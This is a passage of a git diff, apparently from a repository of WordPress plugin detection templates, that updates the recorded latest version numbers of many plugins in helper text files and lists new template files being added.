3 +- .../plugins/host-webfonts-local.yaml | 3 +- .../wordpress/plugins/hostinger.yaml | 5 +- .../wordpress/plugins/image-optimization.yaml | 49 +++++++++++++++++++ .../wordpress/plugins/imagify.yaml | 5 +- .../wordpress/plugins/imsanity.yaml | 3 +- .../plugins/insert-headers-and-footers.yaml | 3 +- .../wordpress/plugins/instagram-feed.yaml | 5 +- .../plugins/intuitive-custom-post-order.yaml | 3 +- .../wordpress/plugins/iwp-client.yaml | 3 +- .../wordpress/plugins/jetpack-boost.yaml | 3 +- .../wordpress/plugins/jetpack.yaml | 3 +- .../wordpress/plugins/kadence-blocks.yaml | 5 +- .../technologies/wordpress/plugins/kirki.yaml | 3 +- .../wordpress/plugins/leadin.yaml | 3 +- .../limit-login-attempts-reloaded.yaml | 3 +- .../plugins/limit-login-attempts.yaml | 3 +- .../wordpress/plugins/litespeed-cache.yaml | 3 +- .../wordpress/plugins/loco-translate.yaml | 3 +- .../wordpress/plugins/loginizer.yaml | 3 +- .../plugins/mailchimp-for-woocommerce.yaml | 3 +- .../wordpress/plugins/mailchimp-for-wp.yaml | 3 +- .../wordpress/plugins/mailpoet.yaml | 3 +- .../wordpress/plugins/maintenance.yaml | 3 +- .../wordpress/plugins/mainwp-child.yaml | 5 +- .../wordpress/plugins/malcare-security.yaml | 3 +- .../wordpress/plugins/megamenu.yaml | 3 +- .../wordpress/plugins/members.yaml | 3 +- .../wordpress/plugins/meta-box.yaml | 3 +- .../wordpress/plugins/metform.yaml | 5 +- .../wordpress/plugins/ml-slider.yaml | 5 +- .../wordpress/plugins/newsletter.yaml | 3 +- .../plugins/nextend-facebook-connect.yaml | 3 +- .../wordpress/plugins/nextgen-gallery.yaml | 5 +- .../wordpress/plugins/ninja-forms.yaml | 5 +- .../wordpress/plugins/ocean-extra.yaml | 3 +- .../plugins/official-facebook-pixel.yaml | 3 +- .../plugins/one-click-demo-import.yaml | 3 +- .../wordpress/plugins/optinmonster.yaml | 3 +- .../wordpress/plugins/otter-blocks.yaml | 3 +- .../wordpress/plugins/password-protected.yaml | 5 +- .../wordpress/plugins/pdf-embedder.yaml | 3 +- .../plugins/pinterest-for-woocommerce.yaml | 3 +- .../wordpress/plugins/pixelyoursite.yaml | 5 +- .../wordpress/plugins/polylang.yaml | 3 +- .../wordpress/plugins/popup-maker.yaml | 5 +- .../wordpress/plugins/post-smtp.yaml | 5 +- .../wordpress/plugins/post-types-order.yaml | 5 +- .../plugins/premium-addons-for-elementor.yaml | 3 +- .../wordpress/plugins/pretty-link.yaml | 3 +- .../plugins/really-simple-captcha.yaml | 3 +- .../wordpress/plugins/really-simple-ssl.yaml | 5 +- .../wordpress/plugins/redirection.yaml | 3 +- .../wordpress/plugins/redux-framework.yaml | 3 +- .../plugins/regenerate-thumbnails.yaml | 3 +- .../plugins/royal-elementor-addons.yaml | 49 +++++++++++++++++++ .../wordpress/plugins/safe-svg.yaml | 3 +- .../wordpress/plugins/seo-by-rank-math.yaml | 5 +- .../wordpress/plugins/sg-cachepress.yaml | 5 +- .../wordpress/plugins/sg-security.yaml | 5 +- .../plugins/shortcodes-ultimate.yaml | 3 +- .../plugins/shortpixel-image-optimiser.yaml | 3 +- .../plugins/simple-custom-post-order.yaml | 3 +- .../wordpress/plugins/simple-history.yaml | 49 +++++++++++++++++++ .../wordpress/plugins/siteguard.yaml | 3 +- .../wordpress/plugins/siteorigin-panels.yaml | 3 +- .../wordpress/plugins/smart-slider-3.yaml | 3 +- .../wordpress/plugins/so-widgets-bundle.yaml | 3 +- .../sticky-header-effects-for-elementor.yaml | 49 +++++++++++++++++++ .../stops-core-theme-and-plugin-updates.yaml | 3 +- .../wordpress/plugins/sucuri-scanner.yaml | 3 +- .../wordpress/plugins/svg-support.yaml | 3 +- .../plugins/table-of-contents-plus.yaml | 3 +- .../wordpress/plugins/tablepress.yaml | 3 +- .../plugins/taxonomy-terms-order.yaml | 3 +- .../wordpress/plugins/templately.yaml | 3 +- .../plugins/the-events-calendar.yaml | 3 +- .../wordpress/plugins/tinymce-advanced.yaml | 3 +- .../plugins/translatepress-multilingual.yaml | 3 +- .../ultimate-addons-for-gutenberg.yaml | 5 +- .../plugins/under-construction-page.yaml | 3 +- .../wordpress/plugins/updraftplus.yaml | 3 +- .../wordpress/plugins/user-role-editor.yaml | 3 +- .../wordpress/plugins/w3-total-cache.yaml | 3 +- .../plugins/webp-converter-for-media.yaml | 3 +- .../wordpress/plugins/webp-express.yaml | 3 +- .../plugins/widget-importer-exporter.yaml | 3 +- .../woo-cart-abandonment-recovery.yaml | 4 +- .../woo-checkout-field-editor-pro.yaml | 3 +- .../plugins/woo-variation-swatches.yaml | 3 +- .../plugins/woocommerce-gateway-stripe.yaml | 3 +- .../plugins/woocommerce-legacy-rest-api.yaml | 49 +++++++++++++++++++ .../plugins/woocommerce-payments.yaml | 5 +- .../plugins/woocommerce-paypal-payments.yaml | 3 +- ...oocommerce-pdf-invoices-packing-slips.yaml | 3 +- .../plugins/woocommerce-services.yaml | 3 +- .../wordpress/plugins/woocommerce.yaml | 3 +- .../wordpress/plugins/wordfence.yaml | 3 +- .../wordpress/plugins/wordpress-importer.yaml | 3 +- .../wordpress/plugins/wordpress-seo.yaml | 3 +- .../wordpress/plugins/worker.yaml | 3 +- .../wordpress/plugins/wp-fastest-cache.yaml | 3 +- .../wordpress/plugins/wp-file-manager.yaml | 3 +- .../wordpress/plugins/wp-google-maps.yaml | 3 +- .../wordpress/plugins/wp-mail-smtp.yaml | 3 +- .../plugins/wp-maintenance-mode.yaml | 3 +- .../wordpress/plugins/wp-migrate-db.yaml | 3 +- .../wordpress/plugins/wp-multibyte-patch.yaml | 3 +- .../wordpress/plugins/wp-optimize.yaml | 3 +- .../wordpress/plugins/wp-pagenavi.yaml | 3 +- .../wordpress/plugins/wp-reset.yaml | 3 +- .../plugins/wp-reviews-plugin-for-google.yaml | 3 +- .../wordpress/plugins/wp-rollback.yaml | 5 +- .../wordpress/plugins/wp-seopress.yaml | 3 +- .../wordpress/plugins/wp-sitemap-page.yaml | 3 +- .../wordpress/plugins/wp-smushit.yaml | 5 +- .../wordpress/plugins/wp-statistics.yaml | 5 +- .../wordpress/plugins/wp-super-cache.yaml | 3 +- .../wordpress/plugins/wpcf7-recaptcha.yaml | 3 +- .../wordpress/plugins/wpcf7-redirect.yaml | 3 +- .../wordpress/plugins/wpforms-lite.yaml | 3 +- .../wordpress/plugins/wps-hide-login.yaml | 3 +- .../plugins/wpvivid-backuprestore.yaml | 3 +- .../plugins/yith-woocommerce-wishlist.yaml | 3 +- 364 files changed, 688 insertions(+), 589 deletions(-) create mode 100644 http/technologies/wordpress/plugins/copy-delete-posts.yaml create mode 100644 http/technologies/wordpress/plugins/image-optimization.yaml create mode 100644 http/technologies/wordpress/plugins/royal-elementor-addons.yaml create mode 100644 http/technologies/wordpress/plugins/simple-history.yaml create mode 100644 http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml create mode 100644 http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt index 93ebf4664e..44c2012635 100644 --- a/helpers/wordpress/plugins/ad-inserter.txt +++ b/helpers/wordpress/plugins/ad-inserter.txt @@ -1 +1 @@ -2.7.33 +N/A \ No newline at end of file diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt index 35d51f33b3..69669de698 100644 --- a/helpers/wordpress/plugins/admin-menu-editor.txt +++ b/helpers/wordpress/plugins/admin-menu-editor.txt @@ -1 +1 @@ -1.12 \ No newline at end of file +1.12.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index 42cc526d6c..39ee137ba5 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.2.4 +6.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/akismet.txt b/helpers/wordpress/plugins/akismet.txt index 11aa145248..ba09cfd650 100644 --- a/helpers/wordpress/plugins/akismet.txt +++ b/helpers/wordpress/plugins/akismet.txt @@ -1 +1 @@ -5.3 \ No newline at end of file +5.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index 0ed2bfe96e..101d404f94 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.5.4 +4.6.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index 248cb03dc3..b0430803ec 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.79 \ No newline at end of file +7.83 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt index e60200b54f..e230c8396d 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt @@ -1 +1 @@ -5.2.5 \ No newline at end of file +5.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/amp.txt b/helpers/wordpress/plugins/amp.txt index f225a78adf..a4db534a2d 100644 --- a/helpers/wordpress/plugins/amp.txt +++ b/helpers/wordpress/plugins/amp.txt @@ -1 +1 @@ -2.5.2 +2.5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/antispam-bee.txt b/helpers/wordpress/plugins/antispam-bee.txt index 9fb6511900..24219ee0f9 100644 --- a/helpers/wordpress/plugins/antispam-bee.txt +++ b/helpers/wordpress/plugins/antispam-bee.txt @@ -1 +1 @@ -2.11.5 \ No newline at end of file +2.11.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 4d54daddb6..2533cac5ba 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.0.2 +4.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt index edcc0e556c..c48ab2bc53 100644 --- a/helpers/wordpress/plugins/autoptimize.txt +++ b/helpers/wordpress/plugins/autoptimize.txt @@ -1 +1 @@ -3.1.10 \ No newline at end of file +3.1.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 4bac418e4a..99eba4de93 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.0.2 \ No newline at end of file +4.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt index e977f5eae6..0d01372d43 100644 --- a/helpers/wordpress/plugins/better-wp-security.txt +++ b/helpers/wordpress/plugins/better-wp-security.txt @@ -1 +1 @@ -9.1.0 \ No newline at end of file +9.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breadcrumb-navxt.txt b/helpers/wordpress/plugins/breadcrumb-navxt.txt index 4b49d9bb63..8b23b8d47c 100644 --- a/helpers/wordpress/plugins/breadcrumb-navxt.txt +++ b/helpers/wordpress/plugins/breadcrumb-navxt.txt @@ -1 +1 @@ -7.2.0 \ No newline at end of file +7.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breeze.txt b/helpers/wordpress/plugins/breeze.txt index fff3132c03..b88e5006fb 100644 --- a/helpers/wordpress/plugins/breeze.txt +++ b/helpers/wordpress/plugins/breeze.txt @@ -1 +1 @@ -2.0.32 \ No newline at end of file +2.1.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index 6b4d157738..047615559c 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -2.2.3 \ No newline at end of file +2.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/child-theme-configurator.txt b/helpers/wordpress/plugins/child-theme-configurator.txt index bd4053bfb1..952f449f1f 100644 --- a/helpers/wordpress/plugins/child-theme-configurator.txt +++ b/helpers/wordpress/plugins/child-theme-configurator.txt @@ -1 +1 @@ -2.6.3 \ No newline at end of file +2.6.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 7f71317e6e..30a59a8b7a 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.30.1 \ No newline at end of file +4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cmb2.txt b/helpers/wordpress/plugins/cmb2.txt index 5cc8215758..ed0edc885b 100644 --- a/helpers/wordpress/plugins/cmb2.txt +++ b/helpers/wordpress/plugins/cmb2.txt @@ -1 +1 @@ -2.10.1 \ No newline at end of file +2.11.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index 97ceee1b9f..c48ab2bc53 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -3.1.5 \ No newline at end of file +3.1.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt index 77a069e39b..b3c5375505 100644 --- a/helpers/wordpress/plugins/code-snippets.txt +++ b/helpers/wordpress/plugins/code-snippets.txt @@ -1 +1 @@ -3.6.2 \ No newline at end of file +3.6.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index 0a0371ddf5..3769235d3e 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.5.5 \ No newline at end of file +7.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index f05e61d963..554960d317 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.8.3 \ No newline at end of file +5.9.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-cfdb7.txt b/helpers/wordpress/plugins/contact-form-cfdb7.txt index bbe7f25a46..a77d7d9272 100644 --- a/helpers/wordpress/plugins/contact-form-cfdb7.txt +++ b/helpers/wordpress/plugins/contact-form-cfdb7.txt @@ -1 +1 @@ -1.2.6.7 \ No newline at end of file +1.2.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index d40b13a3fb..9b7a431d9f 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.1.7 \ No newline at end of file +3.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-notice.txt b/helpers/wordpress/plugins/cookie-notice.txt index b385137924..50b335e8f7 100644 --- a/helpers/wordpress/plugins/cookie-notice.txt +++ b/helpers/wordpress/plugins/cookie-notice.txt @@ -1 +1 @@ -2.4.12 \ No newline at end of file +2.4.17.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt b/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt index 60fdb8d5d2..e184d84776 100644 --- a/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt +++ b/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt @@ -1 +1 @@ -1.6.7 \ No newline at end of file +1.6.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-css-js.txt b/helpers/wordpress/plugins/custom-css-js.txt index 7526964c2a..9b86e60acb 100644 --- a/helpers/wordpress/plugins/custom-css-js.txt +++ b/helpers/wordpress/plugins/custom-css-js.txt @@ -1 +1 @@ -3.45 \ No newline at end of file +3.47 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt index 7c32728738..c5864dcf3e 100644 --- a/helpers/wordpress/plugins/custom-fonts.txt +++ b/helpers/wordpress/plugins/custom-fonts.txt @@ -1 +1 @@ -2.1.1 \ No newline at end of file +2.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-post-type-ui.txt b/helpers/wordpress/plugins/custom-post-type-ui.txt index 795d870011..73d74673c7 100644 --- a/helpers/wordpress/plugins/custom-post-type-ui.txt +++ b/helpers/wordpress/plugins/custom-post-type-ui.txt @@ -1 +1 @@ -1.15.1 \ No newline at end of file +1.17.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-comments.txt b/helpers/wordpress/plugins/disable-comments.txt index 26f8b8bcdf..62e64205bf 100644 --- a/helpers/wordpress/plugins/disable-comments.txt +++ b/helpers/wordpress/plugins/disable-comments.txt @@ -1 +1 @@ -2.4.5 \ No newline at end of file +2.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-gutenberg.txt b/helpers/wordpress/plugins/disable-gutenberg.txt index 06a445799f..50e47c89ca 100644 --- a/helpers/wordpress/plugins/disable-gutenberg.txt +++ b/helpers/wordpress/plugins/disable-gutenberg.txt @@ -1 +1 @@ -3.1 \ No newline at end of file +3.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt index 87a9953579..66e67504fc 100644 --- a/helpers/wordpress/plugins/duplicator.txt +++ b/helpers/wordpress/plugins/duplicator.txt @@ -1 +1 @@ -1.5.7.1 \ No newline at end of file +1.5.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt b/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt index 5ce8b39599..341e509f13 100644 --- a/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt +++ b/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt @@ -1 +1 @@ -1.18.1 \ No newline at end of file +1.20.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/easy-wp-smtp.txt b/helpers/wordpress/plugins/easy-wp-smtp.txt index e3a4f19336..a6254504e4 100644 --- a/helpers/wordpress/plugins/easy-wp-smtp.txt +++ b/helpers/wordpress/plugins/easy-wp-smtp.txt @@ -1 +1 @@ -2.2.0 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index cd17abcc2f..50f12a4532 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.17.3 \ No newline at end of file +3.22.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index d9c62ed923..a4f52a5dbb 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -3.0.2 \ No newline at end of file +3.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/enable-media-replace.txt b/helpers/wordpress/plugins/enable-media-replace.txt index 9d086c6dff..b673f6ac16 100644 --- a/helpers/wordpress/plugins/enable-media-replace.txt +++ b/helpers/wordpress/plugins/enable-media-replace.txt @@ -1 +1 @@ -4.1.4 \ No newline at end of file +4.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/envato-elements.txt b/helpers/wordpress/plugins/envato-elements.txt index 3bad7881d2..476ede462b 100644 --- a/helpers/wordpress/plugins/envato-elements.txt +++ b/helpers/wordpress/plugins/envato-elements.txt @@ -1 +1 @@ -2.0.12 \ No newline at end of file +2.0.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index b883184b12..cac9abc1c5 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.9 \ No newline at end of file +5.9.24 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt index 468c41f93c..d21b198c83 100644 --- a/helpers/wordpress/plugins/ewww-image-optimizer.txt +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -1 +1 @@ -7.2.1 \ No newline at end of file +7.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index b532f3dc33..9b7a431d9f 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.1.4 \ No newline at end of file +3.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fast-indexing-api.txt b/helpers/wordpress/plugins/fast-indexing-api.txt index 95ce23d450..b0c8928e40 100644 --- a/helpers/wordpress/plugins/fast-indexing-api.txt +++ b/helpers/wordpress/plugins/fast-indexing-api.txt @@ -1 +1 @@ -1.1.17 \ No newline at end of file +1.1.18 \ No newline at end of file diff --git a/helpers/wordpress/plugins/flamingo.txt b/helpers/wordpress/plugins/flamingo.txt index 7208c21829..68151b2e10 100644 --- a/helpers/wordpress/plugins/flamingo.txt +++ b/helpers/wordpress/plugins/flamingo.txt @@ -1 +1 @@ -2.4 \ No newline at end of file +2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index ed95ef7767..221ea9b7b5 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -5.1.5 \ No newline at end of file +5.1.19 \ No newline at end of file diff --git a/helpers/wordpress/plugins/font-awesome.txt b/helpers/wordpress/plugins/font-awesome.txt index 64b5ae3938..ae153944ee 100644 --- a/helpers/wordpress/plugins/font-awesome.txt +++ b/helpers/wordpress/plugins/font-awesome.txt @@ -1 +1 @@ -4.4.0 \ No newline at end of file +4.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/force-regenerate-thumbnails.txt b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt index abae0d9a94..c346e7a049 100644 --- a/helpers/wordpress/plugins/force-regenerate-thumbnails.txt +++ b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt @@ -1 +1 @@ -2.1.3 \ No newline at end of file +2.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index c19261717b..ceaae09796 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.5.4 \ No newline at end of file +6.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 3c71e47210..92443952ac 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.28.0 \ No newline at end of file +1.31 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ga-google-analytics.txt b/helpers/wordpress/plugins/ga-google-analytics.txt index b77a82ef84..6b0b4b963d 100644 --- a/helpers/wordpress/plugins/ga-google-analytics.txt +++ b/helpers/wordpress/plugins/ga-google-analytics.txt @@ -1 +1 @@ -20231101 \ No newline at end of file +20240308 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt index c31f242c9b..682895218b 100644 --- a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt +++ b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt @@ -1 +1 @@ -4.12.8 \ No newline at end of file +4.15.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index 3cfdb18dfc..d1762736f9 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.21.0 \ No newline at end of file +7.27.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index ec4cd2ae84..5704ce4690 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.21.0 \ No newline at end of file +8.27.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index e128db9d67..e2bdf6e45a 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.5.12 \ No newline at end of file +2.7.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 16ed9b09d8..b9d0c00afc 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.114.0 \ No newline at end of file +1.129.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-sitemap-generator.txt b/helpers/wordpress/plugins/google-sitemap-generator.txt index 068399f864..7f76021554 100644 --- a/helpers/wordpress/plugins/google-sitemap-generator.txt +++ b/helpers/wordpress/plugins/google-sitemap-generator.txt @@ -1 +1 @@ -4.1.13 \ No newline at end of file +4.1.20 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gtranslate.txt b/helpers/wordpress/plugins/gtranslate.txt index 7da3c16870..8ffc1ad640 100644 --- a/helpers/wordpress/plugins/gtranslate.txt +++ b/helpers/wordpress/plugins/gtranslate.txt @@ -1 +1 @@ -3.0.5 \ No newline at end of file +3.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 7cae202887..dbb3191839 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -17.1.2 \ No newline at end of file +18.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/happy-elementor-addons.txt b/helpers/wordpress/plugins/happy-elementor-addons.txt index f577dfda01..7a8265660d 100644 --- a/helpers/wordpress/plugins/happy-elementor-addons.txt +++ b/helpers/wordpress/plugins/happy-elementor-addons.txt @@ -1 +1 @@ -trunk \ No newline at end of file +3.11.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-code-manager.txt b/helpers/wordpress/plugins/header-footer-code-manager.txt index 474ad5be60..c99926d330 100644 --- a/helpers/wordpress/plugins/header-footer-code-manager.txt +++ b/helpers/wordpress/plugins/header-footer-code-manager.txt @@ -1 +1 @@ -1.1.36 \ No newline at end of file +1.1.38 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-elementor.txt b/helpers/wordpress/plugins/header-footer-elementor.txt index ce2bef547f..7b79522c68 100644 --- a/helpers/wordpress/plugins/header-footer-elementor.txt +++ b/helpers/wordpress/plugins/header-footer-elementor.txt @@ -1 +1 @@ -1.6.17 \ No newline at end of file +1.6.36 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer.txt b/helpers/wordpress/plugins/header-footer.txt index 6a3913b049..132d9f7707 100644 --- a/helpers/wordpress/plugins/header-footer.txt +++ b/helpers/wordpress/plugins/header-footer.txt @@ -1 +1 @@ -3.2.7 \ No newline at end of file +3.2.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index d1cf0f3227..cf51361190 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.7.6 \ No newline at end of file +5.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index 70b02ffc1b..13d683ccbf 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -1.9.4 \ No newline at end of file +3.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/imagify.txt b/helpers/wordpress/plugins/imagify.txt index abae0d9a94..7e541aec69 100644 --- a/helpers/wordpress/plugins/imagify.txt +++ b/helpers/wordpress/plugins/imagify.txt @@ -1 +1 @@ -2.1.3 \ No newline at end of file +2.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/imsanity.txt b/helpers/wordpress/plugins/imsanity.txt index 642c63c424..0409c16385 100644 --- a/helpers/wordpress/plugins/imsanity.txt +++ b/helpers/wordpress/plugins/imsanity.txt @@ -1 +1 @@ -2.8.3 \ No newline at end of file +2.8.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt 